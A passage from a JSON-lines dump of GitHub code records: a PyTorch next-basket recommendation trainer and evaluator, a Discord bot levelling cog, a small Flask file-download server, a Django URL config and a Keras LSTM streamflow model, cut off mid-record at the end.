history_record = np.zeros(output_size)\n for ei in range(input_length - 1):\n if ei == 0: #because first basket in input variable is [-1]\n continue\n for ele in input_variable[ei]:\n history_record[ele] += 1.0 / (input_length - 2)\n\n for ei in range(input_length - 1):\n if ei == 0:\n continue\n encoder_output, encoder_hidden = encoder(input_variable[ei], encoder_hidden)\n encoder_outputs[ei - 1] = encoder_output[0][0]\n\n last_input = input_variable[input_length - 2]\n decoder_hidden = encoder_hidden\n last_hidden = encoder_hidden\n decoder_input = last_input\n\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_outputs, history_record, last_hidden)\n\n #create target tensor.\n vectorized_target = np.zeros(output_size)\n for idx in target_variable[1]:\n vectorized_target[idx] = 1\n target = Variable(torch.FloatTensor(vectorized_target).reshape(1, -1))\n\n if use_cuda:\n target = target.cuda()\n weights = Variable(torch.FloatTensor(codes_inverse_freq).reshape(1, -1))\n if use_cuda:\n weights = weights.cuda()\n\n loss = criterion(decoder_output, target, weights)\n loss.backward()\n\n encoder_optimizer.step()\n decoder_optimizer.step()\n\n return loss.item()\n\n\n######################################################################\n# This is a helper function to print time elapsed and estimated time\n# remaining given the current time and progress %.\n\nimport time\nimport math\n\ndef asMinutes(s):\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n\ndef timeSince(since, percent):\n now = time.time()\n s = now - since\n es = s / (percent)\n rs = es - s\n return '%s (- %s)' % (asMinutes(s), asMinutes(rs))\n\ndef trainIters(data_history, data_future, output_size, encoder, decoder, model_name, training_key_set, val_keyset, codes_inverse_freq, next_k_step,\n n_iters, top_k):\n start = time.time()\n print_loss_total = 0 # Reset every print_every\n # elem_wise_connection.initWeight()\n\n encoder_optimizer = torch.optim.Adam(encoder.parameters(), lr=learning_rate, betas=(0.9, 0.98), eps=1e-11,\n weight_decay=0)\n decoder_optimizer = torch.optim.Adam(decoder.parameters(), lr=learning_rate, betas=(0.9, 0.98), eps=1e-11,\n weight_decay=0)\n\n\n total_iter = 0\n criterion = custom_MultiLabelLoss_torch()\n best_recall = 0.0\n # train n_iters epoch\n for j in range(n_iters):\n # get a suffle list\n key_idx = np.random.permutation(len(training_key_set))\n training_keys = []\n for idx in key_idx:\n training_keys.append(training_key_set[idx])\n\n for iter in tqdm(range(0, len(training_key_set))):\n # get training data and label.\n input_variable = data_history[training_keys[iter]]\n target_variable = data_future[training_keys[iter]]\n\n loss = train(input_variable, target_variable, encoder,\n decoder, codes_inverse_freq, encoder_optimizer, decoder_optimizer, criterion, output_size)\n\n print_loss_total += loss\n total_iter += 1\n\n # print loss and save model\n print_loss_avg = print_loss_total / len(training_key_set)\n print_loss_total = 0\n print('%s (%d %d%%) %.6f' % (timeSince(start, total_iter / (n_iters * len(training_key_set))), total_iter,\n total_iter / (n_iters * len(training_key_set)) * 100, print_loss_avg))\n sys.stdout.flush()\n\n recall, ndcg, hr = evaluate(data_history, data_future, encoder, decoder, output_size, val_keyset, next_k_step,\n top_k)\n if recall>best_recall:\n best_recall=recall\n # print(pred_dict[user])\n filepath = './models/encoder_' + (model_name) + '_model_best'\n torch.save(encoder, filepath)\n filepath = './models/decoder_' + (model_name) + '_model_best'\n torch.save(decoder, filepath)\n print('Recall:', recall)\n print('Finish epoch: ' + str(j))\n print('Model is saved.')\n######################################################################\n# Plotting results\n# ----------------\n#\n# Plotting is done with matplotlib, using the array of loss values\n# ``plot_losses`` saved while training.\n\ncosine_sim = []\npair_cosine_sim = []\n\ndef decoding_next_k_step(encoder, decoder, input_variable, target_variable, output_size, k, activate_codes_num):\n # k is the next k step.\n encoder_hidden = encoder.initHidden()\n\n input_length = len(input_variable)\n encoder_outputs = Variable(torch.zeros(MAX_LENGTH, encoder.hidden_size))\n if use_cuda:\n encoder_outputs = encoder_outputs.cuda()\n\n # history frequency information\n history_record = np.zeros(output_size)\n count = 0.0\n for ei in range(input_length - 1):\n if ei == 0:\n continue\n for ele in input_variable[ei]:\n history_record[ele] += 1\n count += 1.0\n history_record = history_record / count\n\n # basket item iterator\n for ei in range(input_length - 1):\n if ei == 0:\n continue\n encoder_output, encoder_hidden = encoder(input_variable[ei], encoder_hidden)\n encoder_outputs[ei - 1] = encoder_output[0][0]\n\n for ii in range(k):\n vectorized_target = np.zeros(output_size)\n for idx in target_variable[ii + 1]:\n vectorized_target[idx] = 1\n\n vectorized_input = np.zeros(output_size)\n for idx in input_variable[ei]:\n vectorized_input[idx] = 1\n\n decoder_input = input_variable[input_length - 2]\n decoder_hidden = encoder_hidden\n last_hidden = decoder_hidden\n topk = 400\n decoded_vectors = []\n prob_vectors = []\n # k is the number of steps need to predicted, for next basket is 1\n for di in range(k):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_outputs, history_record, last_hidden)\n # topv is top values, topi is top indicies.\n topv, topi = decoder_output.data.topk(topk)\n\n # construct target vector\n vectorized_target = np.zeros(output_size)\n for idx in target_variable[di + 1]:# iter the target basket.\n vectorized_target[idx] = 1\n\n count = 0\n if activate_codes_num > 0:\n pick_num = activate_codes_num\n else:\n pick_num = np.sum(vectorized_target)\n\n tmp = []\n for ele in range(len(topi[0])):\n if count >= pick_num:\n break\n tmp.append(topi[0][ele])\n count += 1\n decoded_vectors.append(tmp)\n decoder_input = tmp\n\n tmp = []\n for i in range(topk):\n tmp.append(topi[0][i])\n prob_vectors.append(tmp)\n\n return decoded_vectors, prob_vectors\n\n\ndef get_precision_recall_Fscore(groundtruth, pred):\n a = groundtruth\n b = pred\n correct = 0\n truth = 0\n positive = 0\n\n for idx in range(len(a)):\n if a[idx] == 1:\n truth += 1\n if b[idx] == 1:\n correct += 1\n if b[idx] == 1:\n positive += 1\n\n flag = 0\n if 0 == positive:\n precision = 0\n flag = 1\n # print('postivie is 0')\n else:\n precision = correct / positive\n if 0 == truth:\n recall = 0\n flag = 1\n # print('recall is 0')\n else:\n recall = correct / truth\n\n if flag == 0 and precision + recall > 0:\n F = 2 * precision * recall / (precision + recall)\n else:\n F = 0\n return precision, recall, F, correct\n\n\ndef get_F_score(prediction, test_Y):\n jaccard_similarity = []\n prec = []\n rec = []\n\n count = 0\n for idx in range(len(test_Y)):\n pred = prediction[idx]\n T = 0\n P = 0\n correct = 0\n for id in range(len(pred)):\n if test_Y[idx][id] == 1:\n T = T + 1\n if pred[id] == 1:\n correct = correct + 1\n if pred[id] == 1:\n P = P + 1\n\n if P == 0 or T == 0:\n continue\n precision = correct / P\n recall = correct / T\n prec.append(precision)\n rec.append(recall)\n if correct == 0:\n jaccard_similarity.append(0)\n else:\n jaccard_similarity.append(2 * precision * recall / (precision + recall))\n count = count + 1\n\n print(\n 'average precision: ' + str(np.mean(prec)))\n print('average recall : ' + str(\n np.mean(rec)))\n print('average F score: ' + str(\n np.mean(jaccard_similarity)))\n\n\ndef get_DCG(groundtruth, pred_rank_list, k):\n count = 0\n dcg = 0\n for pred in pred_rank_list:\n if count >= k:\n break\n if groundtruth[pred] == 1:\n dcg += (1) / math.log2(count + 1 + 1)\n count += 1\n\n return dcg\n\n\ndef get_NDCG(groundtruth, pred_rank_list, k):\n count = 0\n dcg = 0\n for pred in pred_rank_list:\n if count >= k:\n break\n if groundtruth[pred] == 1:\n dcg += (1) / math.log2(count + 1 + 1)\n count += 1\n idcg = 0\n num_real_item = np.sum(groundtruth)\n num_item = int(min(num_real_item, k))\n for i in range(num_item):\n idcg += (1) / math.log2(i + 1 + 1)\n ndcg = dcg / idcg\n return ndcg\n\n\ndef get_HT(groundtruth, pred_rank_list, k):\n count = 0\n for pred in pred_rank_list:\n if count >= k:\n break\n if groundtruth[pred] == 1:\n return 1\n count += 1\n\n return 0\n\n\ndef evaluate(history_data, future_data, encoder, decoder, output_size, test_key_set, next_k_step, activate_codes_num):\n #activate_codes_num: pick top x as the basket.\n prec = []\n rec = []\n F = []\n prec1 = []\n rec1 = []\n F1 = []\n prec2 = []\n rec2 = []\n F2 = []\n prec3 = []\n rec3 = []\n F3 = []\n\n NDCG = []\n n_hit = 0\n count = 0\n\n for iter in range(len(test_key_set)):\n # training_pair = training_pairs[iter - 1]\n # input_variable = training_pair[0]\n # target_variable = training_pair[1]\n input_variable = history_data[test_key_set[iter]]\n target_variable = future_data[test_key_set[iter]]\n\n if len(target_variable) < 2 + next_k_step:\n continue\n count += 1\n output_vectors, prob_vectors = decoding_next_k_step(encoder, decoder, input_variable, target_variable,\n output_size, next_k_step, activate_codes_num)\n\n hit = 0\n for idx in range(len(output_vectors)):\n # for idx in [2]:\n vectorized_target = np.zeros(output_size)\n for ii in target_variable[1 + idx]: #target_variable[[-1], [item, item], .., [-1]]\n vectorized_target[ii] = 1\n\n vectorized_output = np.zeros(output_size)\n for ii in output_vectors[idx]:\n vectorized_output[ii] = 1\n\n precision, recall, Fscore, correct = get_precision_recall_Fscore(vectorized_target, vectorized_output)\n prec.append(precision)\n rec.append(recall)\n F.append(Fscore)\n if idx == 0:\n prec1.append(precision)\n rec1.append(recall)\n F1.append(Fscore)\n elif idx == 1:\n prec2.append(precision)\n rec2.append(recall)\n F2.append(Fscore)\n elif idx == 2:\n prec3.append(precision)\n rec3.append(recall)\n F3.append(Fscore)\n # length[idx] += np.sum(target_variable[1 + idx])\n # prob_vectors is the probability\n target_topi = prob_vectors[idx]\n hit += get_HT(vectorized_target, target_topi, activate_codes_num)\n ndcg = get_NDCG(vectorized_target, target_topi, activate_codes_num)\n NDCG.append(ndcg)\n if hit == next_k_step:\n n_hit += 1\n\n return np.mean(rec), np.mean(NDCG), n_hit / len(test_key_set)\n\n\ndef get_codes_frequency_no_vector(history_data, num_dim, key_set):\n result_vector = np.zeros(num_dim)\n #pid is users id\n for pid in key_set:\n for idx in history_data[pid]:\n if idx == [-1]:\n continue\n result_vector[idx] += 1\n return result_vector\n\n\ndef main(argv):\n\n directory = './amodels/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n dataset = argv[1]\n ind = argv[2]\n history_file = '../../jsondata/'+dataset+'_history.json'\n future_file = '../../jsondata/'+dataset+'_future.json'\n keyset_file = '../../keyset/'+dataset+'_keyset_'+str(ind)+'.json'\n model_version = dataset+str(ind)\n topk = int(argv[3])\n training = int(argv[4])\n\n next_k_step = 1\n with open(history_file, 'r') as f:\n history_data = json.load(f)\n with open(future_file, 'r') as f:\n future_data = json.load(f)\n with open(keyset_file, 'r') as f:\n keyset = json.load(f)\n\n input_size = keyset['item_num']\n training_key_set = keyset['train']\n val_key_set = keyset['val']\n test_key_set = keyset['test']\n\n # weights is inverse personal top frequency. normalized by max freq.\n weights = np.zeros(input_size)\n codes_freq = get_codes_frequency_no_vector(history_data, input_size, future_data.keys())\n max_freq = max(codes_freq)\n for idx in range(len(codes_freq)):\n if codes_freq[idx] > 0:\n weights[idx] = max_freq / codes_freq[idx]\n else:\n weights[idx] = 0\n\n # Sets2sets model\n encoder = EncoderRNN_new(input_size, hidden_size, num_layers)\n attn_decoder = AttnDecoderRNN_new(hidden_size, input_size, num_layers, dropout_p=0.1)\n if use_cuda:\n encoder = encoder.cuda()\n attn_decoder = attn_decoder.cuda()\n\n # train mode or test mode\n if training == 1:\n trainIters(history_data, future_data, input_size, encoder, attn_decoder, model_version, training_key_set, val_key_set, weights,\n next_k_step, num_iter, topk)\n\n else:\n for i in [10, 20]: #top k\n valid_recall = []\n valid_ndcg = []\n valid_hr = []\n recall_list = []\n ndcg_list = []\n hr_list = []\n print('k = ' + str(i))\n for model_epoch in range(num_iter):\n print('Epoch: ', model_epoch)\n encoder_pathes = './models/encoder' + str(model_version) + '_model_epoch' + str(model_epoch)\n decoder_pathes = './models/decoder' + str(model_version) + '_model_epoch' + str(model_epoch)\n\n encoder_instance = torch.load(encoder_pathes, map_location=torch.device('cpu'))\n decoder_instance = torch.load(decoder_pathes, map_location=torch.device('cpu'))\n\n recall, ndcg, hr = evaluate(history_data, future_data, encoder_instance, decoder_instance, input_size,\n val_key_set, next_k_step, i)\n valid_recall.append(recall)\n valid_ndcg.append(ndcg)\n valid_hr.append(hr)\n recall, ndcg, hr = evaluate(history_data, future_data, encoder_instance, decoder_instance, input_size,\n test_key_set, next_k_step, i)\n recall_list.append(recall)\n ndcg_list.append(ndcg)\n hr_list.append(hr)\n valid_recall = np.asarray(valid_recall)\n valid_ndcg = np.asarray(valid_ndcg)\n valid_hr = np.asarray(valid_hr)\n idx1 = valid_recall.argsort()[::-1][0]\n idx2 = valid_ndcg.argsort()[::-1][0]\n idx3 = valid_hr.argsort()[::-1][0]\n print('max valid recall results:')\n print('Epoch: ', idx1)\n print('recall: ', recall_list[idx1])\n print('ndcg: ', ndcg_list[idx1])\n print('phr: ', hr_list[idx1])\n sys.stdout.flush()\n\n print('max valid ndcg results:')\n print('Epoch: ', idx2)\n print('recall: ', recall_list[idx2])\n print('ndcg: ', ndcg_list[idx2])\n print('phr: ', hr_list[idx2])\n sys.stdout.flush()\n\n print('max valid phr results:')\n print('Epoch: ', idx3)\n print('recall: ', recall_list[idx3])\n print('ndcg: ', ndcg_list[idx3])\n print('phr: ', hr_list[idx3])\n sys.stdout.flush()\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"liming-7/A-Next-Basket-Recommendation-Reality-Check","sub_path":"methods/sets2sets/sets2sets_new.py","file_name":"sets2sets_new.py","file_ext":"py","file_size_in_byte":26306,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"} +{"seq_id":"34842840320","text":"from cosmos.core.utilities import StaticProgressBar, converters\n\nimport io\nimport typing\nimport discord\n\nfrom discord.ext import commands\nfrom aiohttp import client_exceptions\nfrom .._models.base import GuildBaseCog\nfrom image_processor_client import exceptions\n\n\nclass ChannelConverter(commands.Converter):\n\n CHANNELS = [\n \"text\",\n \"voice\"\n ]\n\n async def convert(self, ctx, argument):\n if argument.lower() not in self.CHANNELS:\n raise commands.BadArgument\n return argument\n\n\nclass Levels(GuildBaseCog):\n \"\"\"A plugin to implement text or voice levelling feature in server and related commands.\"\"\"\n\n INESCAPABLE = False\n\n @GuildBaseCog.listener()\n async def on_text_level_up(self, profile, channel):\n # guild_profile = await self.bot.guild_cache.get_profile(profile.guild.id)\n # if channel in guild_profile.permissions.disabled_channels:\n # return\n # if guild_profile.get_logger(\"on_text_level_up\"):\n # return\n # embed = self.bot.theme.embeds.one_line.primary(f\"Congratulations {profile.user.name}! \"\n # f\"You advanced to level {profile.level}.\",\n # self.bot.theme.images.chevron)\n # await channel.send(profile.user.mention, embed=embed)\n pass\n\n async def get_level_embed(self, profile):\n try:\n member = profile.member\n except AttributeError:\n member = profile.user\n embed = self.bot.theme.embeds.primary()\n embed.set_author(name=member.display_name + \"'s Level and XP\", icon_url=member.avatar_url)\n text_level_value = f\"`RANK:` # **{await profile.get_text_rank()}**\" \\\n f\"\\n`LEVEL:` **{profile.level}**\" \\\n f\"\\n`XP:` **{profile.xp_progress[0]} / {profile.xp_progress[1]}**\" \\\n f\"\\n`TOTAL XP:` **{profile.xp}**\\n\" \\\n f\"```fix\\n{StaticProgressBar(profile.xp_progress[0], profile.xp_progress[1])}```\"\n voice_level_value = f\"`RANK:` # **{await profile.get_voice_rank()}**\" \\\n f\"\\n`LEVEL:` **{profile.voice_level}**\" \\\n f\"\\n`XP:` **{profile.voice_xp_progress[0]} / {profile.voice_xp_progress[1]}**\" \\\n f\"\\n`TOTAL XP:` **{profile.voice_xp}**\\n\" \\\n f\"```fix\\n{StaticProgressBar(profile.voice_xp_progress[0], profile.voice_xp_progress[1])}\" \\\n f\"```\"\n embed.add_field(name=\"⌨ Text Level\", value=text_level_value, inline=False)\n embed.add_field(name=\"🎤 Voice Level\", value=voice_level_value, inline=False)\n try:\n embed.set_footer(text=profile.guild.name, icon_url=profile.guild.icon_url)\n except AttributeError:\n embed.set_footer(text=\"Cosmos Levels\", icon_url=self.bot.user.avatar_url)\n return embed\n\n async def get_rank_card(self, profile):\n try:\n member = profile.member\n except AttributeError:\n member = profile.user\n payload = {\n \"name\": member.name, \"discriminator\": f\"#{member.discriminator}\", \"avatar_url\": str(member.avatar_url),\n \"text_rank\": await profile.get_text_rank(),\n \"text_xp\": profile.xp_progress[0], \"text_target_xp\": profile.xp_progress[1], \"text_total_xp\": profile.xp,\n \"text_level\": profile.level,\n \"voice_rank\": await profile.get_voice_rank(),\n \"voice_xp\": profile.voice_xp_progress[0], \"voice_target_xp\": profile.voice_xp_progress[1],\n \"voice_total_xp\": profile.voice_xp, \"voice_level\": profile.voice_level,\n }\n rank_card_bytes = await self.bot.image_processor.discord.get_profile_rank_card(**payload)\n return discord.File(io.BytesIO(rank_card_bytes), filename=\"rank.png\")\n\n @GuildBaseCog.cooldown(1, 10, GuildBaseCog.bucket_type.member)\n @GuildBaseCog.group(name=\"уровень\", aliases=[\"лвл\", \"rank\"], invoke_without_command=True, inescapable=False)\n async def levels(self, ctx, *, member: discord.ext.commands.MemberConverter = None):\n \"\"\"Displays current rank, level and experience points gained in current server.\"\"\"\n member = member or ctx.author\n profile = await self.bot.profile_cache.get_guild_profile(member.id, ctx.guild.id)\n try:\n async with ctx.loading():\n file = await self.get_rank_card(profile)\n await ctx.send(file=file)\n except (exceptions.InternalServerError, client_exceptions.ClientConnectorError):\n embed = await self.get_level_embed(profile)\n await ctx.send(embed=embed)\n\n @GuildBaseCog.cooldown(1, 10, GuildBaseCog.bucket_type.user)\n @levels.command(name=\"global\", aliases=[\"cosmos\", \"globals\"])\n async def global_levels(self, ctx, *, member: discord.ext.commands.MemberConverter = None):\n \"\"\"Displays current rank, level and experience points gained globally across all mutual servers.\"\"\"\n member = member or ctx.author\n profile = await self.bot.profile_cache.get_profile(member.id)\n try:\n async with ctx.loading():\n file = await self.get_rank_card(profile)\n await ctx.send(file=file)\n except (exceptions.InternalServerError, client_exceptions.ClientConnectorError):\n embed = await self.get_level_embed(profile)\n await ctx.send(embed=embed)\n\n @staticmethod\n async def __rewards_parser(_, entry, __): # reward, rewards\n value = str()\n if entry.points:\n value += f\"`Points:` **{entry.points}**\\n\"\n value += f\"`Roles:` \" + \" \".join([f\"<@&{_}>\" for _ in entry.roles])\n return f\"Level {entry.level}\", value\n\n @levels.command(name=\"reset\")\n async def reset_user_levels(self, ctx):\n pass # TODO: Add option to reset everyone's guild xp.\n\n @levels.group(name=\"reward\", aliases=[\"rewards\"], invoke_without_command=True)\n async def rewards(self, ctx, channel: typing.Optional[ChannelConverter] = \"text\", level: int = None):\n \"\"\"Displays any rewards set for specified or all of the levels.\n Optionally pass `text` to view Text Levels rewards and `voice` for Voice Levels rewards.\n\n \"\"\"\n rewards = ctx.guild_profile.levels.get_rewards(channel)\n if not rewards:\n return await ctx.send_line(f\"{ctx.emotes.web_emotion.xx} Мы ещё не установили {channel.title()} XP на сервере.\")\n description = \"```css\\n Отображение уровней и их наград, присуждаемые за полученную XP```\"\n if not level:\n paginator = ctx.get_field_paginator(\n sorted(\n rewards.values(), key=lambda reward: reward.level\n ), show_author=False, entry_parser=self.__rewards_parser)\n paginator.embed.description = description\n paginator.embed.set_author(name=f\"Level {channel} Rewards\".title(), icon_url=ctx.guild.icon_url)\n return await paginator.paginate()\n _reward = rewards.get(level)\n if not _reward:\n return await ctx.send_line(f\"{ctx.emotes.web_emotion.xx} Награды для {channel.title()} не предназначены для {level} уровня.\")\n embed = self.bot.theme.embeds.primary()\n embed.description = description\n embed.set_author(name=f\"Награды {channel.title()} Level {level}\", icon_url=ctx.guild.icon_url)\n embed.add_field(name=\"Roles\", value=\" \".join([f\"<@&{role_id}>\" for role_id in _reward.roles]))\n embed.add_field(name=\"Points\", value=_reward.points)\n await ctx.send(embed=embed)\n\n @rewards.command(name=\"set\")\n @commands.has_permissions(administrator=True)\n async def set_rewards(self, ctx, level: int, channel: typing.Optional[ChannelConverter] = \"text\",\n points: typing.Optional[int] = 0, *, roles: converters.RoleConvertor()):\n \"\"\"Set rewards for specified Text or Voice Levels.\n You can set one or multiple roles and optionally Guild Points as rewards.\n\n \"\"\"\n embed = self.bot.theme.embeds.primary()\n embed.set_author(name=f\"Are you sure to set following rewards for \"\n f\"{channel.title()} Level {level}?\", icon_url=ctx.guild.icon_url)\n embed.add_field(name=\"Roles\", value=\" \".join([role.mention for role in roles]))\n embed.add_field(name=\"Points\", value=points)\n if await ctx.confirm(await ctx.send(embed=embed)):\n await ctx.guild_profile.levels.set_rewards(level, [role.id for role in roles], points, channel=channel)\n await ctx.send_line(f\"{ctx.emotes.web_emotion.galka} Награда за {channel.title()} Level {level} была установлена.\")\n\n @rewards.command(name=\"remove\", aliases=[\"delete\"])\n @commands.has_permissions(administrator=True)\n async def remove_rewards(self, ctx, level: int, channel: ChannelConverter = \"text\"):\n \"\"\"Remove any Text or Voice Level rewards set for specified level.\"\"\"\n if not ctx.guild_profile.levels.get_rewards(channel).get(level):\n return await ctx.send_line(f\"{ctx.emotes.web_emotion.xx} There are no rewards assigned for level {level}.\")\n if not await ctx.confirm():\n return\n await ctx.guild_profile.levels.remove_rewards(level, channel=channel)\n await ctx.send_line(f\"{ctx.emotes.web_emotion.galka} Награда за {level} была удалена\")\n","repo_name":"MrFreemanser/Bot","sub_path":"cosmos/galaxies/guild/levels/levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":9701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8490594164","text":"from flask import Flask\nfrom flask import send_file\nimport sys\nimport argparse\n\n\napp = Flask('download file')\nGLOBALS = {}\n\n\ndef parse_arguments():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--path', type=str, required=True)\n\tparser.add_argument('--port', default=5000, type=int)\n\targs = parser.parse_args()\n\treturn args.path, args.port\n\n\t\n@app.route('/')\ndef download_file():\n\treturn send_file(GLOBALS['path'], as_attachment=True)\n\n\t\nif __name__ == '__main__':\n\tpath, port = parse_arguments()\n\tGLOBALS['path'] = path\n\tapp.run(host='0.0.0.0', port=port)\n","repo_name":"linoyazdi/best-black-box-ever","sub_path":"download file website/download_website.py","file_name":"download_website.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13972486074","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.news, name='news'),\n url(r'^(?P[0-9]+)/$', views.news_detail, name='news_detail'),\n url(r'^(?P[0-9]+)/comment/$', views.add_comment_to_news, name='add_comment_to_news'),\n url(r'^(?P[0-9]+)/edit/$', views.news_edit, name='news_edit'),\n url(r'^new/$', views.news_new, name='news_new'),\n\n]\n","repo_name":"lauosi/library-django","sub_path":"news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28657419169","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport random\nimport tensorflow as tf\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import Sequential, Input, Model\nfrom keras import optimizers\nfrom keras.layers import LSTM, Dense, Dropout\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\n## fix the figure size and axes grid\nmpl.rcParams['figure.figsize'] = (12,8)\nmpl.rcParams['axes.grid'] = False\n\n## shifts columns of dataframe df by shift\ndef supervised(df,cols,shift):\n n_cols=len(cols)\n ##shifts columns of dataframe df by shift\n n_cols=len(cols)\n ad=df.iloc[:,cols]\n nms=ad.columns\n cols,names=[],[]\n for i in range(shift,0,-1):\n cols.append(ad.shift(i))\n names+=[('%s(t-%d)'%(nms[j],i)) for j in range(len(nms))]\n cols.append(ad.shift(0))\n names+=[('%s(t)'%(nms[j])) for j in range(len(nms))]\n agg=pd.concat(cols,axis=1)\n agg.columns=names \n agg.dropna(inplace=True)\n return agg\n\n## this function removed the data from simulated and observed data wherever the observed data contains nan\ndef filter_nan(s,o):\n data = np.array([s.flatten(),o.flatten()])\n data = np.transpose(data)\n return data[:,0],data[:,1]\n\n## Evaluation metrics\ndef NS(s,o):\n \n #Nash Sutcliffe efficiency coefficient\n #input:\n #s: simulated\n #o: observed\n #output:\n #ns: Nash Sutcliffe efficient coefficient\n \n s,o = filter_nan(s,o)\n return 1 - sum((s-o)**2)/sum((o-np.mean(o))**2)\ndef pc_bias(s,o):\n \"\"\"\n Percent Bias\n input:\n s: simulated\n o: observed\n output:\n pc_bias: percent bias\n \"\"\"\n s,o = filter_nan(s,o)\n return 100.0*sum(o-s)/sum(o)\ndef rmse(s,o):\n \"\"\"\n Root Mean Squared Error\n input:\n s: simulated\n o: observed\n output:\n rmses: root mean squared error\n \"\"\"\n s,o = filter_nan(s,o)\n return np.sqrt(np.mean((s-o)**2))\ndef WB(s,o):\n s,o = filter_nan(s,o)\n return 1 - abs(1 - ((sum(s))/(sum(o))))\n\n## import data\ndf = pd.read_csv('keesara_catchment_daily_ML_input_data.csv')\n\n## define training period\ncal_start = '1998-01-01' \ncal_end = '2010-12-31'\ntraining_period = len(pd.date_range(start = cal_start,end = cal_end))\n\nperform = pd.DataFrame()\nperform[\"Dropout\"] = \"\"\nperform[\"Epochs\"] = \"\"\nperform[\"Hidden_units\"] = \"\"\n\nperform['Batch_size_Q'] = \"\"\nperform[\"NSE_cal_Q\"] = \"\"\nperform[\"PBIAS_cal_Q\"] = \"\"\nperform[\"RMSE_cal_Q\"] = \"\"\nperform[\"WB_cal_Q\"] = \"\"\nperform[\"NSE_val_Q\"] = \"\"\nperform[\"PBIAS_val_Q\"] = \"\"\nperform[\"RMSE_val_Q\"] = \"\"\nperform[\"WB_val_Q\"] = \"\"\n\n## select required data for prediction of given variable\ndata_Q = df[['Pptn_total','PET_total','Q_ds']]\nndays = 1 \nnfuture = 1 \nninputs_Q = 2\nndays_Q = 1\nnobs_Q = ndays_Q * ninputs_Q\nNtest = training_period\n\n## model hyperparameters\nhidden_units_Q = 20\ndropout_Q = 0.4\nbatch_size_Q = 32\nepochs_Q = 300\n\n### Q prediction\nreframed_Q = supervised(data_Q,[0,1,2],0) \nreframed_new_Q = reframed_Q[['Pptn_total(t)','PET_total(t)','Q_ds(t)']]\n\n## split into train and test datasets\nXYdata_Q = reframed_new_Q.values\nXYtrain_Q = XYdata_Q[:Ntest, :]\nXYtest_Q = XYdata_Q[Ntest:, :]\nyobs_train_Q = XYdata_Q[:Ntest, -1:]\nyobs_test_Q = XYdata_Q[Ntest:, -1:]\nscaledXYtrain_Q = XYtrain_Q\nscaledXYtest_Q = XYtest_Q\n\n## split into input and outputs\ntrain_X_Q, train_y_Q = scaledXYtrain_Q[:, :nobs_Q], scaledXYtrain_Q[:, -1:]\ntest_X_Q = scaledXYtest_Q[:, :nobs_Q]\ntrain_X_Q = train_X_Q.reshape((train_X_Q.shape[0], ndays_Q, ninputs_Q))\ntest_X_Q = test_X_Q.reshape((test_X_Q.shape[0], ndays_Q, ninputs_Q))\n\n## define and fit LSTM model\nnp.random.seed(1234)\ntf.random.set_seed(1234)\nmodel_Q = Sequential() \nmodel_Q.add(LSTM(hidden_units_Q, input_shape=(train_X_Q.shape[1], train_X_Q.shape[2])))\nmodel_Q.add(Dropout(dropout_Q))\nmodel_Q.add(Dense(1, activation = 'relu')) \nmodel_Q.compile(loss = 'mse',optimizer='adam') \nhistory_Q = model_Q.fit(train_X_Q, train_y_Q, batch_size = batch_size_Q, epochs=epochs_Q, shuffle=True,validation_split=0.2, verbose=0)\nplt.plot(history_Q.history['loss'])\nplt.plot(history_Q.history['val_loss'])\nplt.title('model loss for Q prediction')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper right')\nplt.show()\n\n## outputs in training\nyhat_Q = model_Q.predict(train_X_Q)\ntrain_X_Q = train_X_Q.reshape((train_X_Q.shape[0], nobs_Q))\ninv_yhat_Q = np.concatenate((train_X_Q, yhat_Q), axis=1)\nNNytrain_Q = inv_yhat_Q[:,-1:]\ntrain_X_Q = train_X_Q.reshape((train_X_Q.shape[0], ndays_Q, ninputs_Q))\n\n## outputs in testing\nyhat_test_Q = model_Q.predict(test_X_Q)\ntest_X_Q = test_X_Q.reshape((test_X_Q.shape[0], nobs_Q))\ninv_yhat_test_Q = np.concatenate((test_X_Q, yhat_test_Q), axis=1)\nNNytest_Q = inv_yhat_test_Q[:,-1:]\ntest_X_Q = test_X_Q.reshape((test_X_Q.shape[0], ndays_Q, ninputs_Q))\nmean_train_Q = np.array(NNytrain_Q)\nmean_test_Q = np.array(NNytest_Q)\n\n## evaluate outputs\n(s,o) = (mean_test_Q[:], yobs_test_Q[:])\nNS_Q = NS(s,o)\nPBIAS_Q = pc_bias(s,o)\nRMSE_Q = rmse(s,o)\nWB_Q = WB(s,o)\n(s_train, o_train) = (mean_train_Q, yobs_train_Q)\nNS_Q_cal = NS(s_train, o_train)\nPBIAS_Q_cal = pc_bias(s_train,o_train)\nRMSE_Q_cal = rmse(s_train,o_train)\nWB_Q_cal = WB(s_train, o_train)\nop = df[['Date','Pptn_total','PET_total','Q_ds']][Ntest:] \nop1 = op.reset_index(drop=True)\nop1['Q_ml_sim'] = s[:]\nop1.to_csv('keesara_catchment_ML_testing_output.csv')\n\nperform = perform.append({\"Dropout\":dropout_Q,\"Epochs\":epochs_Q,\"Hidden_units\":hidden_units_Q,'Batch_size_Q' : batch_size_Q, \n\"NSE_cal_Q\" : NS_Q_cal, \n\"PBIAS_cal_Q\" : PBIAS_Q_cal, \n\"RMSE_cal_Q\" : RMSE_Q_cal, \n\"WB_cal_Q\" : WB_Q_cal, \n\"NSE_val_Q\" : NS_Q, 